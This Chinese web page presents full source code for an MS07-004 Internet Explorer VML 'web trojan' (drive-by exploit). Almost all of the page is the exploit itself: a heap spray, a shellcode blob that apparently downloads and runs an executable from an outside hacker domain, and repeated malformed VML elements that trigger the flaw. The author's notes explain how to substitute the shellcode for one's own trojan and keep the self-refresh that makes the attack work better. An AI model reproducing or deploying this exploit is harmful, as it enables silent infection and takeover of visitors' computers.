精典的ASP传奇的J2EE新生的NETFTP服务器服务器安全WINDOWSB/S 模式WEB安全WAP世界动态网站推广宣传
空间服务器数据库技术邮局服务器站長工具硬设与组建Alexa专题DHTML项目管理WEB标准电脑硬件
病毒知识电脑使用布线协议接入交换路由局域网无线网络网络规划
Visual BasicVisual C/C++MssqlMySqloracleSybase 存在安全风险进程系统进程列表应用程序进程列表其它进程列表
黑客编程漏洞分析本地提权免杀技术脚本漏洞数据库注入安全防护内网渗透加密解密工具使用
WAP技术WAP入门
 您的位置:   >> 相关知识 >> 病毒木马 >> 病毒知识 >>

新编MS07004网页木马源码

合金网络科技

 
  添加日期:2007-4-13 点击次数:43次  
   
 
<html xmlns:v='urn:schemas-microsoft-com:vml'>
<head>
<object id='VMLRender'
classid='CLSID:10072CEC-8CC1-11D1-986E-00A0C955B42E'>
</object>
<style>
v\:* { behavior: url(#VMLRender); }
</style>
</head>
<body>
<SCRIPT language='javascript'>
setTimeout('document.location.reload(false)',2000);
shellcode =unescape('%u9090%u9090%u0feb%u335b%u66c9%u80b9%u8001%uef33%ue243%uebfa%ue805%uffec%uffff%u8b7f%udf4e%uefef%u64ef%ue3af%u9f64%u42f3%u9f64%u6ee7%uef03%uefeb%u64ef%ub903%u6187%ue1a1%u0703%uef11%uefef%uaa66%ub9eb%u7787%u6511%u07e1%uef1f%uefef%uaa66%ub9e7%uca87%u105f%u072d%uef0d%uefef%uaa66%ub9e3%u0087%u0f21%u078f%uef3b%uefef%uaa66%ub9ff%u2e87%u0a96%u0757%uef29%uefef%uaa66%uaffb%ud76f%u9a2c%u6615%uf7aa%ue806%uefee%ub1ef%u9a66%u64cb%uebaa%uee85%u64b6%uf7ba%u07b9%uef64%uefef%u87bf%uf5d9%u9fc0%u7807%uefef%u66ef%uf3aa%u2a64%u2f6c%u66bf%ucfaa%u1087%uefef%ubfef%uaa64%u85fb%ub6ed%uba64%u07f7%uef8e%uefef%uaaec%u28cf%ub3ef%uc191%u288a%uebaf%u8a97%uefef%u9a10%u64cf%ue3aa%uee85%u64b6%uf7ba%uaf07%uefef%u85ef%ub7e8%uaaec%udccb%ubc34%u10bc%ucf9a%ubcbf%uaa64%u85f3%ub6ea%uba64%u07f7%uefcc%uefef%uef85%u9a10%u64cf%ue7aa%ued85%u64b6%uf7ba%uff07%uefef%u85ef%u6410%uffaa%uee85%u64b6%uf7ba%uef07%uefef%uaeef%ubdb4%u0eec%u0eec%u0eec%u0eec%u036c%ub5eb%u64bc%u0d35%ubd18%u0f10%u64ba%u6403%ue792%ub264%ub9e3%u9c64%u64d3%uf19b%uec97%ub91c%u9964%ueccf%udc1c%ua626%u42ae%u2cec%udcb9%ue019%uff51%u1dd5%ue79b%u212e%uece2%uaf1d%u1e04%u11d4%u9ab1%ub50a%u0464%ub564%ueccb%u8932%ue364%u64a4%uf3b5%u32ec%ueb64%uec64%ub12a%u2db2%uefe7%u1b07%u1011%uba10%ua3bd%ua0a2%uefa1%u7468%u7074%u2F3A%u772F%u7777%u2E31%u6168%u6B63%u7265%u6F6F%u6F63%u2F6D%u2E31%u7865%u0065');
bigblock = unescape('%u0505%u0505');
headersize = 20;
slackspace = headersize+shellcode.length;
while (bigblock.length<slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<0x40000) block = block+block+fillblock;
memory = new Array();
for (i=0;i<450;i++) memory[i] = block + shellcode;
</script>

<v:rect style=’width:120pt;height:80pt’ fillcolor='red' >
<v:recolorinfo NumColOrS='97612895' recolorstate='t'>
<v:recolorinfoentry tocolor='rgb(1,0,64)' recolortype='1285'
lbcolor='rgb(1,0,64)' forecolor='rgb(1,0,64)' backcolor='rgb(1,0,64)'
fromcolor='rgb(1,0,64)' lbstyle ='32' bitmaptype='3'/>
<v:recolorinfoentry tocolor='rgb(1,0,64)' recolortype='1285'
lbcolor='rgb(1,0,64)' forecolor='rgb(1,0,64)' backcolor='rgb(1,0,64)'
fromcolor='rgb(1,0,64)' lbstyle ='32' bitmaptype='3'/>
<v:recolorinfoentry tocolor='rgb(1,0,64)' recolortype='1285'
lbcolor='rgb(1,0,64)' forecolor='rgb(1,0,64)' backcolor='rgb(1,0,64)'
fromcolor='rgb(1,0,64)' lbstyle ='32' bitmaptype='3'/>
<v:recolorinfoentry tocolor='rgb(1,0,64)' recolortype='1285'
lbcolor='rgb(1,0,64)' forecolor='rgb(1,0,64)' backcolor='rgb(1,0,64)'
fromcolor='rgb(1,0,64)' lbstyle ='32' bitmaptype='3'/>
<v:recolorinfoentry tocolor='rgb(1,0,64)' recolortype='1285'
lbcolor='rgb(1,0,64)' forecolor='rgb(1,0,64)' backcolor='rgb(1,0,64)'
fromcolor='rgb(1,0,64)' lbstyle ='32' bitmaptype='3'/>
<v:recolorinfoentry tocolor='rgb(1,0,64)' recolortype='1285'
lbcolor='rgb(1,0,64)' forecolor='rgb(1,0,64)' backcolor='rgb(1,0,64)'
fromcolor='rgb(1,0,64)' lbstyle ='32' bitmaptype='3'/>
<v:recolorinfoentry tocolor='rgb(1,0,64)' recolortype='1285'
lbcolor='rgb(1,0,64)' forecolor='rgb(1,0,64)' backcolor='rgb(1,0,64)'
fromcolor='rgb(1,0,64)' lbstyle ='32' bitmaptype='3'/>
<v:recolorinfoentry tocolor='rgb(1,0,64)' recolortype='1285'
lbcolor='rgb(1,0,64)' forecolor='rgb(1,0,64)' backcolor='rgb(1,0,64)'
fromcolor='rgb(1,0,64)' lbstyle ='32' bitmaptype='3'/>
<v:recolorinfoentry tocolor='rgb(1,0,64)' recolortype='1285'
lbcolor='rgb(1,0,64)' forecolor='rgb(1,0,64)' backcolor='rgb(1,0,64)'
fromcolor='rgb(1,0,64)' lbstyle ='32' bitmaptype='3'/>
<v:recolorinfoentry tocolor='rgb(1,0,64)' recolortype='1285'
lbcolor='rgb(1,0,64)' forecolor='rgb(1,0,64)' backcolor='rgb(1,0,64)'
fromcolor='rgb(1,0,64)' lbstyle ='32' bitmaptype='3'/>
<v:recolorinfoentry tocolor='rgb(1,0,64)' recolortype='1285'
lbcolor='rgb(1,0,64)' forecolor='rgb(1,0,64)' backcolor='rgb(1,0,64)'
fromcolor='rgb(1,0,64)' lbstyle ='32' bitmaptype='3'/>
<v:recolorinfoentry tocolor='rgb(1,0,64)' recolortype='1285'
lbcolor='rgb(1,0,64)' forecolor='rgb(1,0,64)' backcolor='rgb(1,0,64)'
fromcolor='rgb(1,0,64)' lbstyle ='32' bitmaptype='3'/>
<v:recolorinfoentry tocolor='rgb(1,0,64)' recolortype='1285'
lbcolor='rgb(1,0,64)' forecolor='rgb(1,0,64)' backcolor='rgb(1,0,64)'
fromcolor='rgb(1,0,64)' lbstyle ='32' bitmaptype='3'/>
<v:recolorinfoentry tocolor='rgb(1,0,64)' recolortype='1285'
lbcolor='rgb(1,0,64)' forecolor='rgb(1,0,64)' backcolor='rgb(1,0,64)'
fromcolor='rgb(1,0,64)' lbstyle ='32' bitmaptype='3'/>
<v:recolorinfoentry tocolor='rgb(1,0,64)' recolortype='1285'
lbcolor='rgb(1,0,64)' forecolor='rgb(1,0,64)' backcolor='rgb(1,0,64)'
fromcolor='rgb(1,0,64)' lbstyle ='32' bitmaptype='3'/>
<v:recolorinfoentry tocolor='rgb(1,0,64)' recolortype='1285'
lbcolor='rgb(1,0,64)' forecolor='rgb(1,0,64)' backcolor='rgb(1,0,64)'
fromcolor='rgb(1,0,64)' lbstyle ='32' bitmaptype='3'/>
<v:recolorinfoentry tocolor='rgb(1,0,64)' recolortype='1285'
lbcolor='rgb(1,0,64)' forecolor='rgb(1,0,64)' backcolor='rgb(1,0,64)'
fromcolor='rgb(1,0,64)' lbstyle ='32' bitmaptype='3'/>
<v:recolorinfoentry tocolor='rgb(1,0,64)' recolortype='1285'
lbcolor='rgb(1,0,64)' forecolor='rgb(1,0,64)' backcolor='rgb(1,0,64)'
fromcolor='rgb(1,0,64)' lbstyle ='32' bitmaptype='3'/>
<v:recolorinfoentry tocolor='rgb(1,0,64)' recolortype='1285'
lbcolor='rgb(1,0,64)' forecolor='rgb(1,0,64)' backcolor='rgb(1,0,64)'
fromcolor='rgb(1,0,64)' lbstyle ='32' bitmaptype='3'/>
<v:recolorinfoentry tocolor='rgb(1,0,64)' recolortype='1285'
lbcolor='rgb(1,0,64)' forecolor='rgb(1,0,64)' backcolor='rgb(1,0,64)'
fromcolor='rgb(1,0,64)' lbstyle ='32' bitmaptype='3'/>
<v:recolorinfoentry tocolor='rgb(1,0,64)' recolortype='1285'
lbcolor='rgb(1,0,64)' forecolor='rgb(1,0,64)' backcolor='rgb(1,0,64)'
fromcolor='rgb(1,0,64)' lbstyle ='32' bitmaptype='3'/>
<v:recolorinfoentry tocolor='rgb(1,0,64)' recolortype='1285'
lbcolor='rgb(1,0,64)' forecolor='rgb(1,0,64)' backcolor='rgb(1,0,64)'
fromcolor='rgb(1,0,64)' lbstyle ='32' bitmaptype='3'/>
<v:recolorinfoentry tocolor='rgb(1,0,64)' recolortype='1285'
lbcolor='rgb(1,0,64)' forecolor='rgb(1,0,64)' backcolor='rgb(1,0,64)'
fromcolor='rgb(1,0,64)' lbstyle ='32' bitmaptype='3'/>
<v:recolorinfoentry tocolor='rgb(1,0,64)' recolortype='1285'
lbcolor='rgb(1,0,64)' forecolor='rgb(1,0,64)' backcolor='rgb(1,0,64)'
fromcolor='rgb(1,0,64)' lbstyle ='32' bitmaptype='3'/>
<v:recolorinfoentry tocolor='rgb(1,0,64)' recolortype='1285'
lbcolor='rgb(1,0,64)' forecolor='rgb(1,0,64)' backcolor='rgb(1,0,64)'
fromcolor='rgb(1,0,64)' lbstyle ='32' bitmaptype='3'/>
<v:recolorinfoentry tocolor='rgb(1,0,64)' recolortype='1285'
lbcolor='rgb(1,0,64)' forecolor='rgb(1,0,64)' backcolor='rgb(1,0,64)'
fromcolor='rgb(1,0,64)' lbstyle ='32' bitmaptype='3'/>
<v:recolorinfoentry tocolor='rgb(1,0,64)' recolortype='1285'
lbcolor='rgb(1,0,64)' forecolor='rgb(1,0,64)' backcolor='rgb(1,0,64)'
fromcolor='rgb(1,0,64)' lbstyle ='32' bitmaptype='3'/>
<v:recolorinfoentry tocolor='rgb(1,0,64)' recolortype='1285'
lbcolor='rgb(1,0,64)' forecolor='rgb(1,0,64)' backcolor='rgb(1,0,64)'
fromcolor='rgb(1,0,64)' lbstyle ='32' bitmaptype='3'/>
<v:recolorinfoentry tocolor='rgb(1,0,64)' recolortype='1285'
lbcolor='rgb(1,0,64)' forecolor='rgb(1,0,64)' backcolor='rgb(1,0,64)'
fromcolor='rgb(1,0,64)' lbstyle ='32' bitmaptype='3'/>
<v:recolorinfoentry tocolor='rgb(1,0,64)' recolortype='1285'
lbcolor='rgb(1,0,64)' forecolor='rgb(1,0,64)' backcolor='rgb(1,0,64)'
fromcolor='rgb(1,0,64)' lbstyle ='32' bitmaptype='3'/>
<v:recolorinfoentry tocolor='rgb(1,0,64)' recolortype='1285'
lbcolor='rgb(1,0,64)' forecolor='rgb(1,0,64)' backcolor='rgb(1,0,64)'
fromcolor='rgb(1,0,64)' lbstyle ='32' bitmaptype='3'/>
<v:recolorinfoentry tocolor='rgb(1,0,64)' recolortype='1285'
lbcolor='rgb(1,0,64)' forecolor='rgb(1,0,64)' backcolor='rgb(1,0,64)'
fromcolor='rgb(1,0,64)' lbstyle ='32' bitmaptype='3'/>
<v:recolorinfoentry tocolor='rgb(1,0,64)' recolortype='1285'
lbcolor='rgb(1,0,64)' forecolor='rgb(1,0,64)' backcolor='rgb(1,0,64)'
fromcolor='rgb(1,0,64)' lbstyle ='32' bitmaptype='3'/>
<v:recolorinfoentry tocolor='rgb(1,0,64)' recolortype='1285'
lbcolor='rgb(1,0,64)' forecolor='rgb(1,0,64)' backcolor='rgb(1,0,64)'
fromcolor='rgb(1,0,64)' lbstyle ='32' bitmaptype='3'/>
<v:recolorinfoentry tocolor='rgb(1,0,64)' recolortype='1285'
lbcolor='rgb(1,0,64)' forecolor='rgb(1,0,64)' backcolor='rgb(1,0,64)'
fromcolor='rgb(1,0,64)' lbstyle ='32' bitmaptype='3'/>
<v:recolorinfoentry tocolor='rgb(1,0,64)' recolortype='1285'
lbcolor='rgb(1,0,64)' forecolor='rgb(1,0,64)' backcolor='rgb(1,0,64)'
fromcolor='rgb(1,0,64)' lbstyle ='32' bitmaptype='3'/>
<v:recolorinfoentry tocolor='rgb(1,0,64)' recolortype='1285'
lbcolor='rgb(1,0,64)' forecolor='rgb(1,0,64)' backcolor='rgb(1,0,64)'
fromcolor='rgb(1,0,64)' lbstyle ='32' bitmaptype='3'/>
<v:recolorinfoentry tocolor='rgb(1,0,64)' recolortype='1285'
lbcolor='rgb(1,0,64)' forecolor='rgb(1,0,64)' backcolor='rgb(1,0,64)'
fromcolor='rgb(1,0,64)' lbstyle ='32' bitmaptype='3'/>
<v:recolorinfoentry tocolor='rgb(1,0,64)' recolortype='1285'
lbcolor='rgb(1,0,64)' forecolor='rgb(1,0,64)' backcolor='rgb(1,0,64)'
fromcolor='rgb(1,0,64)' lbstyle ='32' bitmaptype='3'/>
<v:recolorinfoentry tocolor='rgb(1,0,64)' recolortype='1285'
lbcolor='rgb(1,0,64)' forecolor='rgb(1,0,64)' backcolor='rgb(1,0,64)'
fromcolor='rgb(1,0,64)' lbstyle ='32' bitmaptype='3'/>
<v:recolorinfoentry tocolor='rgb(1,0,64)' recolortype='1285'
lbcolor='rgb(1,0,64)' forecolor='rgb(1,0,64)' backcolor='rgb(1,0,64)'
fromcolor='rgb(1,0,64)' lbstyle ='32' bitmaptype='3'/>
<v:recolorinfoentry tocolor='rgb(1,0,64)' recolortype='1285'
lbcolor='rgb(1,0,64)' forecolor='rgb(1,0,64)' backcolor='rgb(1,0,64)'
fromcolor='rgb(1,0,64)' lbstyle ='32' bitmaptype='3'/>
<v:recolorinfoentry tocolor='rgb(1,0,64)' recolortype='1285'
lbcolor='rgb(1,0,64)' forecolor='rgb(1,0,64)' backcolor='rgb(1,0,64)'
fromcolor='rgb(1,0,64)' lbstyle ='32' bitmaptype='3'/>
<v:recolorinfoentry tocolor='rgb(1,0,64)' recolortype='1285'
lbcolor='rgb(1,0,64)' forecolor='rgb(1,0,64)' backcolor='rgb(1,0,64)'
fromcolor='rgb(1,0,64)' lbstyle ='32' bitmaptype='3'/>
<v:recolorinfoentry tocolor='rgb(1,0,64)' recolortype='1285'
lbcolor='rgb(1,0,64)' forecolor='rgb(1,0,64)' backcolor='rgb(1,0,64)'
fromcolor='rgb(1,0,64)' lbstyle ='32' bitmaptype='3'/>
<v/recolorinfo>
</html>


事先说明`这个不是平衡堆栈处理过`平衡堆栈的貌似要1W大元。

我修改的这个还算可以,成功后会关掉IE,但不出现IE错误,至于卡不卡`我没感觉出来,虚拟机没办法感觉,,使用方法,用幻影的那个生成器`把自己的木马生成出来`把shellcode替换掉本代码里,就是

shellcode =unescape('%u9090%u9090%u0feb%u335b%u66c9%u80b9%u8001%uef33%ue243%uebfa%ue805%uffec%uffff%u8b7f%udf4e%uefef%u64ef%ue3af%u9f64%u42f3%u9f64%u6ee7%uef03%uefeb%u64ef%ub903%u6187%ue1a1%u0703%uef11%uefef%uaa66%ub9eb%u7787%u6511%u07e1%uef1f%uefef%uaa66%ub9e7%uca87%u105f%u072d%uef0d%uefef%uaa66%ub9e3%u0087%u0f21%u078f%uef3b%uefef%uaa66%ub9ff%u2e87%u0a96%u0757%uef29%uefef%uaa66%uaffb%ud76f%u9a2c%u6615%uf7aa%ue806%uefee%ub1ef%u9a66%u64cb%uebaa%uee85%u64b6%uf7ba%u07b9%uef64%uefef%u87bf%uf5d9%u9fc0%u7807%uefef%u66ef%uf3aa%u2a64%u2f6c%u66bf%ucfaa%u1087%uefef%ubfef%uaa64%u85fb%ub6ed%uba64%u07f7%uef8e%uefef%uaaec%u28cf%ub3ef%uc191%u288a%uebaf%u8a97%uefef%u9a10%u64cf%ue3aa%uee85%u64b6%uf7ba%uaf07%uefef%u85ef%ub7e8%uaaec%udccb%ubc34%u10bc%ucf9a%ubcbf%uaa64%u85f3%ub6ea%uba64%u07f7%uefcc%uefef%uef85%u9a10%u64cf%ue7aa%ued85%u64b6%uf7ba%uff07%uefef%u85ef%u6410%uffaa%uee85%u64b6%uf7ba%uef07%uefef%uaeef%ubdb4%u0eec%u0eec%u0eec%u0eec%u036c%ub5eb%u64bc%u0d35%ubd18%u0f10%u64ba%u6403%ue792%ub264%ub9e3%u9c64%u64d3%uf19b%uec97%ub91c%u9964%ueccf%udc1c%ua626%u42ae%u2cec%udcb9%ue019%uff51%u1dd5%ue79b%u212e%uece2%uaf1d%u1e04%u11d4%u9ab1%ub50a%u0464%ub564%ueccb%u8932%ue364%u64a4%uf3b5%u32ec%ueb64%uec64%ub12a%u2db2%uefe7%u1b07%u1011%uba10%ua3bd%ua0a2%uefa1%u7468%u7074%u2F3A%u772F%u7777%u2E31%u6168%u6B63%u7265%u6F6F%u6F63%u2F6D%u2E31%u7865%u0065');


另外,

bigblock = unescape('%u0505%u0505');
headersize = 20;
slackspace = headersize+shellcode.length;
while (bigblock.length<slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<0x40000) block = block+block+fillblock;
memory = new Array();
for (i=0;i<450;i++) memory[i] = block + shellcode; 

这里是反着写的,带自刷新,这样效果会更好,不想自刷新`可以自己修改
精典的ASP精选TOP
· 利用ADODB.Stream 防盗链
· Adodb.Stream说明手册
· 采集需要登录
· ASP 判断远程图片是否存在
· 在ServerXMLHTTP组件中使用代理服务器
· 用XMLHTTP通过代理服务器从服务提取数据的一些问题
· objXML.readystate的值
· 互联网HTTP连接等出错代码大全
· 利用XMLHTTP实现的二级连动Select
· 利用 xmlhttp 分块上传文件
 
服务器安全点击TOP
· 新云最新漏洞总结篇
· 各类网站的默认数据库和密码
· Windows Server2003 防木马权限设置IIS服务器安全配置整理
· 针对ASP网站的Win 2003硬盘安全设置
· IIS 6 的PHP 最佳配置方法
· 利用SA.exe 将Iusr_victim克隆为Administrator
· Cmd模式下的入侵技术大全
· 破解网页代码加密
· SERV-U 6.4提权方法,通杀SERV-U版本
· 新云网站管理系统文件注入漏洞
 
硬设与组建点击TOP
· 从头到尾教你组建小型局域网20
· 从头到尾教你组建小型局域网19
· 从头到尾教你组建小型局域网18
· 从头到尾教你组建小型局域网17
· 从头到尾教你组建小型局域网16
· 从头到尾教你组建小型局域网15
· 从头到尾教你组建小型局域网14
· 从头到尾教你组建小型局域网13
· 从头到尾教你组建小型局域网12
· 从头到尾教你组建小型局域网11
 
病毒知识点击TOP
· 不再重装 手动清除顽固病毒AutoRUN
· 木马静态变动态 DLL木马程序大揭秘
· 详解一个很牛X的网马
· 一个网马
· Trojan-Downloader.Win32.Delf.bab
· 抓了一个AJAX的网马
· 迅雷5 最新0day利用程序
· 自动关掉270种杀毒软件
· RealPlayer 最新网马
· 五个反弹型后门的源代码
 
WINDOWS点击TOP
· 4【系统知识】常见文件扩展名及简要说明!!! ==超详尽==
· 3【系统知识】常见文件扩展名及简要说明!!! ==超详尽==
· 2【系统知识】常见文件扩展名及简要说明!!! ==超详尽==
· 1【系统知识】常见文件扩展名及简要说明!!! ==超详尽==
· Capture an HTML document as an image
· 如何给eWebEditor编辑器加上运行代码框功能
· 给CuteEditor5增加了高亮代码显示功能
· CuteEditor6.0使用配置心得体会
· 关于IE插件的CLSID问题
· 对开发的程序(制作CAB)进行签名,并允许网站中使用
  "凌风微型文章系统",针对"搜索引擎"完美设计,提高"搜索引擎"对网站容量,质量的评估值,"扁平化,转静态 ..."